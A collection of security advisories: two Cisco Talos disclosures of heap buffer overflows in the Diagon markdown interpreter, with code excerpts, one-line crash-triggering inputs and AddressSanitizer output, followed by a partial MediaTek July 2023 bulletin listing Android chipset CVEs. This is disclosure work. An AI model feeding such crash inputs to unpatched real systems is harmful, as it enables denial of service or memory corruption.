An access violation vulnerability exists in the GraphPlanar::Write functionality of Diagon v1.0.139. A specially crafted network request can lead to a heap buffer overflow. An attacker can send a network request to trigger this vulnerability.

**SUMMARY**

An access violation vulnerability exists in the GraphPlanar::Write functionality of Diagon v1.0.139. A specially crafted network request can lead to a heap buffer overflow. An attacker can send a network request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Diagon v1.0.139

**PRODUCT URLS**

Diagon - https://github.com/ArthurSonzogni/Diagon

**CVSSv3 SCORE**

4.0 - CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L

**CWE**

CWE-122 - Heap-based Buffer Overflow

**DETAILS**

Diagon is an interpreter that translates markdown into several formats: latex, planar graph, table, tree and many others.

The Diagon interpreter translates from a representation of a graph to a planar graph. For instance, the input could looks like this:

    A--B--C--D--E--F--D--C
    

And the planar graph would result in:

          ┌─┐
          │A│
          └┬┘
          ┌┴┐
          │B│
          └┬┘
    ┌─────┐│
    │  D  ││
    └┬─┬─┬┘│
     │ │┌┴┐│
     │ ││E││
     │ │└┬┘│
     │┌┴─┴┐│
     ││ F ││
     │└───┘│
    ┌┴─────┴─┐
    │   C    │
    └────────┘
    

The input will be parsed and eventually reach the GraphPlanar::Write() function:

    void GraphPlanar::Write() {
      ComputeArrowStyle();
    
      if (id_to_name.size() <= 2) {
        return;
      }
    
      int num_vertices = id_to_name.size();
    
      // Create a graph.
      Graph graph(num_vertices);
      for (auto& it : vertex)
        add_edge(it.from, it.to, graph);
      InitializeEdgeIndex(graph);
    
      // Make it connected.
      boost::make_connected(graph);                                                                         [1]
      InitializeEdgeIndex(graph);
    
      // Make it biconnected.
      Embedding embedding;
      bool is_planar = ComputePlanarEmbedding(graph, embedding);
      if (!is_planar) {
        output_ = "Graph is not planar.\n";
        return;
      }
    
      boost::make_biconnected_planar(graph, embedding.data());                                              [2]
      InitializeEdgeIndex(graph);
      Graph biconnected_graph(graph);
    
      ComputePlanarEmbedding(graph, embedding);
      boost::make_maximal_planar(graph, embedding.data());                                                  [3]
      InitializeEdgeIndex(graph);
    
      // Find a canonical ordering.
      ComputePlanarEmbedding(graph, embedding);
      std::vector<boost::graph_traits<Graph>::vertex_descriptor> ordering;
      boost::planar_canonical_ordering(graph, embedding.data(),
                                       std::back_inserter(ordering));                                       [4]
    
      std::vector<size_t> inverse_ordering(num_vertices);                                                   [5]
      for (int i = 0; i < inverse_ordering.size(); ++i) {
        inverse_ordering[ordering[i]] = i;                                                                  [6]
      }
      [...]
    }
    

This function, until the code at [3], will manipulate the graph representation of the input to satisfy the pre-requisites of the planar_canonical_ordering function at [4]. Indeed, to call the planar_canonical_ordering at [4], the graph must be maximal planar; that is, calculated at [3]. Before calling the make_maximal_planar at [3] the graph must be biconnected. To make the graph biconnected, the function make_biconnected_planar, at [2], is called. The last dependency is that the graph must be connected, which is satisfied using make_connected called at [1].

The Graph type is defined as follows:

    using Graph = boost::adjacency_list<boost::vecS,
                                boost::vecS,
                                boost::undirectedS,
                                boost::property<boost::vertex_index_t, int>,
                                boost::property<boost::edge_index_t, int>>;
    

The first template parameter is used to specify how to store the edges. In this case, the boost::vecS will store the edges in a std::vector. This configuration will allow parallel edges. For instance, in the example bellow, we have the edge (C,D) but also (D,E).

Using the boost::vecS, allegedly, will break some assumption of the called function. For instance, it could create a graph that is not biconnected at [2]. This can lead to an out-of-bounds read and write. In the POC shown below, after calling the planar_canonical_ordering function at [4] the ordering will have a number of elements lower than the num_vertices variable that represent the number of vertices in the graph. Because inverse_ordering, at [5] , is created based on the actual number of vertices, the inverse_ordering buffer and the ordering one will mismatch in sizes. This would cause, at [6], an out-of-bounds read and write.

**Exploit Proof of Concept**

Following the content of the POC used:

    $ cat POC.md
    A--B--C--D--E--F--D--C
    

If we run Diagon compile with ASAN with the POC:

    $ diagon GraphPlanar < POC.md
    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==3943598==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x0000006952ef bp 0x7ffddd10d730 sp 0x7ffddd10c7e0 T0)
    ==3943598==The signal is caused by a READ memory access.
    ==3943598==Hint: this fault was caused by a dereference of a high value address (see register values below).  Dissassemble the provided pc to learn which register was used.
        #0 0x6952ef in GraphPlanar::Write() /home/vagrant/Diagon/src/translator/graph_planar/GraphPlanar.cpp:342:35
        #1 0x693085 in GraphPlanar::Translate(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) /home/vagrant/Diagon/src/translator/graph_planar/GraphPlanar.cpp:194:3
        #2 0x4fbd0e in (anonymous namespace)::Translate(Translator*, int, char const**) /home/vagrant/Diagon/src/main.cpp:277:36
        #3 0x4f97e7 in main /home/vagrant/Diagon/src/main.cpp:326:12
        #4 0x7fe4a9895d09 in __libc_start_main csu/../csu/libc-start.c:308:16
        #5 0x44ca69 in _start (/home/vagrant/Diagon/results/ordering_graphplanar_write_error/diagon_unfixed+0x44ca69)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /home/vagrant/Diagon/src/translator/graph_planar/GraphPlanar.cpp:342:35 in GraphPlanar::Write()
    ==3943598==ABORTING
    

We can see that a segmentation fault occured. The GraphPlanar.cpp:342 line corresponds to the code at [6]

**VENDOR RESPONSE**

The maintainer has provided a patch at: https://github.com/ArthurSonzogni/Diagon/releases/tag/v1.1.158

**TIMELINE**

2023-05-03 - Vendor Disclosure  
2023-05-08 - Vendor Patch Release  
2023-07-05 - Public Release

Discovered by Francesco Benvenuto of Cisco Talos.

CVE-2023-31194: TALOS-2023-1745 || Cisco Talos Intelligence Group

A heap-based buffer overflow vulnerability exists in the Sequence::DrawText functionality of Diagon v1.0.139. A specially crafted network request can lead to a heap buffer overflow. An attacker can send a network request to trigger this vulnerability.

**SUMMARY**

A heap-based buffer overflow vulnerability exists in the Sequence::DrawText functionality of Diagon v1.0.139. A specially crafted network request can lead to a heap buffer overflow. An attacker can send a network request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Diagon v1.0.139

**PRODUCT URLS**

Diagon - https://github.com/ArthurSonzogni/Diagon

**CVSSv3 SCORE**

8.4 - CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-122 - Heap-based Buffer Overflow

**DETAILS**

Diagon is an interpreter that translates markdown in several formats: latex, planar graph, table, tree and many others.

The Diagon interpreter translates a markdown text sequence diagram to a graphical sequence diagram. For instance, the input could look like this:

    Left -> Right: Message1
    Left <- Right: Message2
    

and the sequence diagram would result in:

     ┌────┐  ┌─────┐
     │Left│  │Right│
     └─┬──┘  └──┬──┘
       │        │
       │Message1│
       │───────>│
       │        │
       │Message2│
       │<───────│
     ┌─┴──┐  ┌──┴──┐
     │Left│  │Right│
     └────┘  └─────┘
    

The input will be parsed and will eventually reach the Sequence::UniformizeActors function:

    void Sequence::UniformizeActors() {
      [...]
    
      for (auto& message : messages) {
        for (auto& actor : {message.from, message.to}) {
          if (!actor_index.count(actor)) {
            actor_index[actor] = actors.size();
            Actor a;
            a.name = actor;
            actors.push_back(a);
          }
        }
      }
    }
    

This function will parse the actors in each message in messages, which consist of each row of the sequence diagram text. The actors are the sender and the receiver. In the example above, the actors are “Left” and “Right.” The function populates the actors vector and associates, in the actor_index map, the name of the actor with the number of elements in the actors vector at the creation time of the entry. This essentially can be considered an index starting from 0 and increasing with each new actor.

Eventually the Sequence::LayoutComputeActorsPositions function will be called to calculate the position of the various actors in the sequence diagram:

    void Sequence::LayoutComputeActorsPositions() {
      [...]
      
      for (auto& message : messages) {
        ActorSpace space{actor_index[message.from],  //
                         actor_index[message.to],    //
                         message.width + 1};         //
        if (space.a > space.b)
          std::swap(space.a, space.b);
        spaces.push_back(space);
      }
    
      if (actors.size() != 0)
        actors[0].center = actors[0].name.size() / 2 + 1;
    
      bool modified = true;
      int i = 0;
      while (modified) {
        modified = false;
        for (const ActorSpace& s : spaces) {
          if (actors[s.b].center - actors[s.a].center < s.space) {                                                  [1]
            actors[s.b].center = actors[s.a].center + s.space;
            modified = true;
          }
        }
        if (i++ > 500) {                                                                                            [2]
          std::cout << "Something went wrong!" << std::endl;
          break;
        }
      }
    
      for (auto& actor : actors) {                                                                                  [3]
        actor.left = actor.center - actor.name.size() / 2 - actor.name.size() % 2;
        actor.right = actor.left + actor.name.size() + 2;
      }
    }
    

Then, using the calculated positions, a Screen class is instantiated:

    std::string Sequence::Draw() {
        // Estimate output dimension.
        int width = actors.back().right;
        int height = 0;
        for (const Message& message : messages) {
          height = std::max(height, message.bottom);
        }
        height += 4;
    
        Screen screen(width, height);
    
        for (auto& actor : actors)
          actor.Draw(screen, height);
    
        for (auto message : messages)
          message.Draw(screen);
    
        if (ascii_only_)
          screen.ASCIIfy(0);
        return screen.ToString();
    }
    

The Screen class contains the lines_ matrix where the graphical sequence diagram is going to be written. This matrix takes into consideration the various sizes involved: the actors, the arrows, the messages, etc. Eventually the names of the actors and the messages between the them will be “drawn.” For each of these texts the Screen::DrawText function will be called:

    void Screen::DrawText(int x, int y, std::wstring_view text) {
        for (auto& c : text)
            lines_[y][x++] = c;                                                                                     [4]
    } Here `lines_` is the member of the `Screen` class instantiated in `Sequence::Draw`.
    

Sequence::LayoutComputeActorsPositions uses a variable called spaces. This is a vector dictating the minimum spaces between two actors. The spaces vector contains various instances of the ActorSpace struct. This struct contains two indexes for specifying which actors are involved: the ones stored in the actor_index map, and an integer value that represents the minimum spaces required between the two actors. For each message, one struct is created, using the minimum space required to write the message between the two actors. The spaces vector also contains the spaces required for each pair of adjacent actors. Each actor has three parameters to satisfy this space requirements: left, center and right. These dictate the position of each actor in the diagram.

To simplify the code explanation following, we are going to omit that the spaces array has the distances also for the adjacent actors and consider only the spaces in relationship to the messages and their sender and receiver actors. The Sequence::LayoutComputeActorsPositions function executes a while loop to modifying the actors positions based on the content of spaces. The while is executed until either the condition actors[s.b].center - actors[s.a].center < s.space, at [1], is false, meaning that the space between the two actors is enough for the message to be drawn with no modification of the actors positions, or the while has been executed 500 times, a check is executed at [2], and something was wrong, as suggested by the print.

This function has a bug, which can lead to a heap buffer overflow. Let’s take for example the following representation of a sequence diagram:

      A -> A:Message
    

In this example the sender and the receiver are the same actor, meaning that the index of the two will be equal; in this example, 0. The condition at [1], actors[s.b].center - actors[s.a].center < s.space for this example, can be simplified as actors[0].center - actors[0].center < s.space. Because the portion on the left is always equal to 0, this condition is always true. This means that the actors[s.b].center value is always updated without progress for making the condition at [1] false. Furthermore, also at [3], the actor’s left and right positions are updated, increasing their value.

Eventually the code at [4] is reached. The variable lines_ has a width and a height that are based on the positions calculated for the actors and the messages. The problem is that, even if the while in Sequence::LayoutComputeActorsPositions has been executed 500 times, no progress on changing the position of the actor to accommodate the message has been made. Indeed, the actor’s center, left and right values increased substantially, but the distance between the values did not. In this example the only actor present has the following position values:

      (gdb) p actors
      $19 = std::vector of length 1, capacity 1 = {{
          [...]
          left = 0xfb0,
          center = 0xfb1,
          right = 0xfb3
        }}
    

The left is 1 value from center, which is 2 value away from right. This is due to the calculation made at [3]. The space between left and right should take into consideration the length of the message, but because of the bug just explained it was not possible to account for that. This can lead to a heap buffer overflow vulnerability at [4] writing the message out-of-bounds.

**Exploit Proof of Concept**

Following the content of the POC used:

    $ cat POC.md
    A->A:POC_BOF
    

If we run Diagon compilation with ASAN with the POC:

    $ diagon Sequence < POC.md
    
    Something went wrong!
    =================================================================
    ==256826==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x628000017fd0 at pc 0x000000c77eab bp 0x7fff5f481050 sp 0x7fff5f481048
    WRITE of size 4 at 0x628000017fd0 thread T0
        #0 0xc77eaa in Screen::DrawText(int, int, std::basic_string_view<wchar_t, std::char_traits<wchar_t> >) /home/vagrant/Diagon/src/screen/Screen.cpp:32:20
        #1 0x8a1515 in Message::Draw(Screen&) /home/vagrant/Diagon/src/translator/sequence/Sequence.cpp:71:12
        #2 0x8aefb0 in Sequence::Draw[abi:cxx11]() /home/vagrant/Diagon/src/translator/sequence/Sequence.cpp:692:13
        #3 0x8acc37 in Sequence::Translate(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) /home/vagrant/Diagon/src/translator/sequence/Sequence.cpp:293:10
        #4 0x4fbd0e in (anonymous namespace)::Translate(Translator*, int, char const**) /home/vagrant/Diagon/src/main.cpp:277:36
        #5 0x4f97e7 in main /home/vagrant/Diagon/src/main.cpp:326:12
        #6 0x7f1a7e31ad09 in __libc_start_main csu/../csu/libc-start.c:308:16
        #7 0x44ca69 in _start (/home/vagrant/Diagon/build/diagon-1.0.139+0x44ca69)
    
    0x628000017fd0 is located 0 bytes to the right of 16080-byte region [0x628000014100,0x628000017fd0)
    allocated by thread T0 here:
        #0 0x4f677d in operator new(unsigned long) (/home/vagrant/Diagon/build/diagon-1.0.139+0x4f677d)
        #1 0x7f1a7e655a0e in void std::__cxx11::basic_string<wchar_t, std::char_traits<wchar_t>, std::allocator<wchar_t> >::_M_construct<wchar_t*>(wchar_t*, wchar_t*, std::forward_iterator_tag) (/lib/x86_64-linux-gnu/libstdc++.so.6+0x14ba0e)
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /home/vagrant/Diagon/src/screen/Screen.cpp:32:20 in Screen::DrawText(int, int, std::basic_string_view<wchar_t, std::char_traits<wchar_t> >)
    Shadow bytes around the buggy address:
      0x0c507fffafa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c507fffafb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c507fffafc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c507fffafd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c507fffafe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0c507fffaff0: 00 00 00 00 00 00 00 00 00 00[fa]fa fa fa fa fa
      0x0c507fffb000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c507fffb010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c507fffb020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c507fffb030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c507fffb040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==256826==ABORTING
    

We can see that a heap buffer overflow occured at Sequence.cpp:71 that corresponds to the code at [4].

**VENDOR RESPONSE**

The maintainer has provided a patch at: https://github.com/ArthurSonzogni/Diagon/releases/tag/v1.1.158

**TIMELINE**

2023-05-03 - Vendor Disclosure  
2023-05-08 - Vendor Patch Release  
2023-07-05 - Public Release

Discovered by Francesco Benvenuto of Cisco Talos.

CVE-2023-27390: TALOS-2023-1744 || Cisco Talos Intelligence Group

There is an unauthenticated buffer overflow vulnerability in the process controlling the ArubaOS web-based management interface. Successful exploitation of this vulnerability results in a Denial-of-Service (DoS) condition affecting the web-based management interface of the controller.

CVE-2023-35979

In display, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07978760; Issue ID: ALPS07363410.

**July 2023 Product Security Bulletin**

Published 2023-07-03

The MediaTek Product Security Bulletin contains details of security vulnerabilities affecting MediaTek Smartphone, Tablet, AIoT, Smart display, Smart platform, OTT and Wi-Fi chipsets. Device OEMs have been notified of all the issues and the corresponding security patches for at least two months before publication.

The severity of the identified vulnerabilities was conducted based on the Common Vulnerability Scoring System version 3.1 (CVSS v3.1).

****Summary****

Severity

**CVEs**

High

CVE-2023-20754, CVE-2023-20755

Medium

CVE-2023-20753, CVE-2023-20756, CVE-2023-20757, CVE-2023-20758, CVE-2023-20759, CVE-2023-20760, CVE-2023-20761, CVE-2023-20766, CVE-2023-20767, CVE-2023-20768, CVE-2023-20771, CVE-2023-20772, CVE-2023-20773, CVE-2023-20774, CVE-2023-20775, CVE-2023-20689, CVE-2023-20690, CVE-2023-20691, CVE-2023-20692, CVE-2023-20693, CVE-2022-32666, CVE-2023-20748

****Details****

CVE

**CVE-2023-20754**

Title

Integer overflow or wraparound in keyinstall

Severity

High

Vulnerability Type

EoP

CWE

CWE-190 Integer Overflow or Wraparound

Description

In keyinstall, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6580, MT6731, MT6735, MT6737, MT6739, MT6753, MT6757, MT6757C, MT6757CD, MT6757CH, MT6761, MT6762, MT6763, MT6765, MT6768, MT6769, MT6771, MT6779, MT6781, MT6785, MT6789, MT6833, MT6835, MT6853, MT6853T, MT6855, MT6873, MT6875, MT6877, MT6879, MT6883, MT6885, MT6886, MT6889, MT6891, MT6893, MT6895, MT6983, MT6985, MT8185, MT8321, MT8385, MT8666, MT8667, MT8765, MT8766, MT8768, MT8781, MT8786, MT8788, MT8789, MT8791, MT8791T, MT8797

Affected Software Versions

Android 11.0, 12.0, 13.0

CVE

**CVE-2023-20755**

Title

Improper input validation in keyinstall

Severity

High

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In keyinstall, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6580, MT6731, MT6735, MT6737, MT6739, MT6753, MT6757, MT6757C, MT6757CD, MT6757CH, MT6761, MT6762, MT6763, MT6765, MT6768, MT6769, MT6771, MT6779, MT6781, MT6785, MT6789, MT6833, MT6835, MT6853, MT6853T, MT6855, MT6873, MT6875, MT6877, MT6879, MT6883, MT6885, MT6886, MT6889, MT6891, MT6893, MT6895, MT6983, MT6985, MT8185, MT8321, MT8385, MT8666, MT8667, MT8765, MT8766, MT8768, MT8781, MT8786, MT8788, MT8789, MT8791, MT8791T, MT8797

Affected Software Versions

Android 11.0, 12.0, 13.0

CVE

**CVE-2023-20753**

Title

Out-of-bounds write in rpmb

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-787 Out-of-bounds Write

Description

In rpmb, there is a possible out of bounds write due to a logic error. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6580, MT6731, MT6735, MT6737, MT6739, MT6753, MT6757, MT6757C, MT6757CD, MT6757CH, MT6761, MT6762, MT6763, MT6765, MT6768, MT6769, MT6771, MT6779, MT6781, MT6785, MT6789, MT6833, MT6835, MT6853, MT6853T, MT6855, MT6873, MT6875, MT6877, MT6879, MT6883, MT6885, MT6886, MT6889, MT6891, MT6893, MT6895, MT6983, MT6985, MT8185, MT8321, MT8385, MT8666, MT8673, MT8675, MT8765, MT8766, MT8768, MT8781, MT8786, MT8788, MT8789, MT8791T, MT8797

Affected Software Versions

Android 11.0, 12.0, 13.0

CVE

**CVE-2023-20756**

Title

Integer overflow or wraparound in keyinstall

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-190 Integer Overflow or Wraparound

Description

In keyinstall, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6580, MT6731, MT6735, MT6737, MT6739, MT6753, MT6757, MT6757C, MT6757CD, MT6757CH, MT6761, MT6762, MT6763, MT6765, MT6768, MT6769, MT6771, MT6779, MT6781, MT6785, MT6789, MT6833, MT6835, MT6853, MT6853T, MT6855, MT6873, MT6875, MT6877, MT6879, MT6883, MT6885, MT6886, MT6889, MT6891, MT6893, MT6895, MT6983, MT6985, MT8185, MT8321, MT8385, MT8666, MT8667, MT8765, MT8766, MT8768, MT8781, MT8786, MT8788, MT8789, MT8791, MT8791T, MT8797

Affected Software Versions

Android 12.0, 13.0

CVE

**CVE-2023-20757**

Title

Improper input validation in cmdq

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In cmdq, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6739, MT6768, MT6771, MT6785, MT6833, MT6853, MT6853T, MT6873, MT6877, MT6883, MT6885, MT6889, MT6893, MT8786, MT8789, MT8797

Affected Software Versions

Android 12.0, 13.0

CVE

**CVE-2023-20758**

Title

Improper input validation in cmdq

Severity

Medium

Vulnerability Type

DoS

CWE

CWE-20 Improper Input Validation

Description

In cmdq, there is a possible memory corruption due to a missing bounds check. This could lead to local denial of service with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6739, MT6768, MT6771, MT6781, MT6785, MT6833, MT6853, MT6853T, MT6873, MT6877, MT6883, MT6885, MT6889, MT6893, MT8786, MT8789, MT8797

Affected Software Versions

Android 12.0, 13.0

CVE

**CVE-2023-20759**

Title

Improper input validation in cmdq

Severity

Medium

Vulnerability Type

DoS

CWE

CWE-20 Improper Input Validation

Description

In cmdq, there is a possible memory corruption due to a missing bounds check. This could lead to local denial of service with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6739, MT6768, MT6771, MT6781, MT6785, MT6833, MT6853, MT6853T, MT6873, MT6877, MT6883, MT6885, MT6889, MT6893, MT8786, MT8789, MT8797

Affected Software Versions

Android 12.0, 13.0

CVE

**CVE-2023-20760**

Title

Improper input validation in apu

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In apu, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6879, MT6895, MT6983, MT8195

Affected Software Versions

Android 12.0, 13.0

CVE

**CVE-2023-20761**

Title

Improper input validation in ril

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In ril, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6739, MT6761, MT6762, MT6763, MT6765, MT6768, MT6769, MT6771, MT6779, MT6781, MT6785, MT6789, MT6833, MT6835, MT6853, MT6853T, MT6855, MT6873, MT6875, MT6877, MT6879, MT6883, MT6885, MT6886, MT6889, MT6891, MT6893, MT6895, MT6983, MT6985, MT8321, MT8765, MT8766, MT8768, MT8781, MT8786, MT8788, MT8789, MT8791, MT8791T, MT8797

Affected Software Versions

Android 12.0, 13.0

CVE

**CVE-2023-20766**

Title

Improper input validation in gps

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In gps, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6580, MT6735, MT6739, MT6753, MT6757, MT6761, MT6762, MT6763, MT6765, MT6768, MT6769, MT6771, MT6779, MT6781, MT6785, MT6789, MT6833, MT6853, MT6853T, MT6855, MT6873, MT6875, MT6877, MT6879, MT6886, MT6891, MT6893, MT6895, MT6983, MT6985, MT8167, MT8168, MT8173, MT8175, MT8185, MT8321, MT8362A, MT8365, MT8385, MT8666, MT8667, MT8675, MT8765, MT8766, MT8768, MT8781, MT8786, MT8788, MT8789, MT8791, MT8791T, MT8797

Affected Software Versions

Android 11.0, 12.0, 13.0

CVE

**CVE-2023-20767**

Title

Improper input validation in pqframework

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In pqframework, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6879, MT6886, MT6895, MT6983, MT6985, MT8167, MT8168, MT8195, MT8673

Affected Software Versions

Android 12.0, 13.0

CVE

**CVE-2023-20768**

Title

Access of resource using incompatible type ('type confusion') in ion

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-843 Access of Resource Using Incompatible Type ('Type Confusion')

Description

In ion, there is a possible out of bounds read due to type confusion. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6580, MT6735, MT6737, MT6739, MT6753, MT6757, MT6757C, MT6757CD, MT6757CH, MT6761, MT6762, MT6763, MT6765, MT6768, MT6769, MT6771, MT6779, MT6781, MT6785, MT6833, MT6853, MT6853T, MT6873, MT6875, MT6877, MT6883, MT6885, MT6889, MT6891, MT6893, MT8168, MT8195, MT8321, MT8666, MT8675, MT8765, MT8766, MT8768, MT8786, MT8788, MT8791T, MT8797

Affected Software Versions

Android 11.0, 12.0

CVE

**CVE-2023-20771**

Title

Concurrent execution using shared resource with improper synchronization ('race condition') in display

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-662 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')

Description

In display, there is a possible memory corruption due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6580, MT6739, MT6761, MT6765, MT6768, MT6771, MT6779, MT6785, MT8168, MT8781

Affected Software Versions

Android 12.0

CVE

**CVE-2023-20772**

Title

Improper authentication in vow

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-287 Improper Authentication

Description

In vow, there is a possible escalation of privilege due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6580, MT6735, MT6737, MT6739, MT6753, MT6761, MT6765, MT6768, MT6771, MT6779, MT6781, MT6785, MT6789, MT6833, MT6835, MT6853, MT6853T, MT6855, MT6873, MT6877, MT6879, MT6883, MT6885, MT6886, MT6889, MT6893, MT6895, MT6983, MT6985, MT8781, MT8791, MT8791T, MT8797

Affected Software Versions

Android 12.0, 13.0

CVE

**CVE-2023-20773**

Title

Improper authentication in vow

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-287 Improper Authentication

Description

In vow, there is a possible escalation of privilege due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6580, MT6735, MT6737, MT6739, MT6753, MT6761, MT6765, MT6768, MT6771, MT6779, MT6781, MT6785, MT6789, MT6833, MT6835, MT6853, MT6853T, MT6855, MT6873, MT6877, MT6879, MT6883, MT6885, MT6886, MT6889, MT6893, MT6895, MT6983, MT6985, MT8781, MT8791, MT8791T, MT8797

Affected Software Versions

Android 12.0, 13.0

CVE

**CVE-2023-20774**

Title

Improper input validation in display

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In display, there is a possible out of bounds read due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6789, MT6835, MT6855, MT6886, MT6895, MT6983, MT6985, MT8195, MT8673, MT8781

Affected Software Versions

Android 12.0, 13.0

CVE

**CVE-2023-20775**

Title

Buffer copy without checking size of input ('classic buffer overflow') in display

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-120 Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')

Description

In display, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6739, MT6757, MT6757C, MT6757CD, MT6757CH, MT6761, MT6763, MT6765, MT6768, MT6771, MT6779, MT6781, MT6785, MT6789, MT6833, MT6835, MT6853, MT6853T, MT6855, MT6873, MT6877, MT6879, MT6885, MT6886, MT6889, MT6890, MT6893, MT6895, MT6983, MT6985, MT6990, MT8168, MT8183, MT8195, MT8673, MT8781

Affected Software Versions

Android 12.0, 13.0 / OpenWrt 21.02 / RDKB 2022Q3

CVE

**CVE-2023-20689**

Title

Integer overflow to buffer overflow in wlan

Severity

Medium

Vulnerability Type

DoS

CWE

CWE-680 Integer Overflow to Buffer Overflow

Description

In wlan firmware, there is possible system crash due to an integer overflow. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6739, MT8167, MT8321, MT8365, MT8385, MT8666, MT8765, MT8788

Affected Software Versions

Android 11.0 / IOT-v23.0 (Yocto 4.0)

CVE

**CVE-2023-20690**

Title

Integer overflow to buffer overflow in wlan

Severity

Medium

Vulnerability Type

DoS

CWE

CWE-680 Integer Overflow to Buffer Overflow

Description

In wlan firmware, there is possible system crash due to an integer overflow. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6739, MT8167, MT8168, MT8321, MT8365, MT8385, MT8666, MT8765, MT8788

Affected Software Versions

Android 11.0, 12.0 / IOT-v23.0 (Yocto 4.0)

CVE

**CVE-2023-20691**

Title

Integer overflow to buffer overflow in wlan

Severity

Medium

Vulnerability Type

DoS

CWE

CWE-680 Integer Overflow to Buffer Overflow

Description

In wlan firmware, there is possible system crash due to an integer overflow. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6739, MT8167, MT8321, MT8365, MT8385, MT8666, MT8765, MT8788

Affected Software Versions

Android 11.0, 12.0 / IOT-v23.0 (Yocto 4.0)

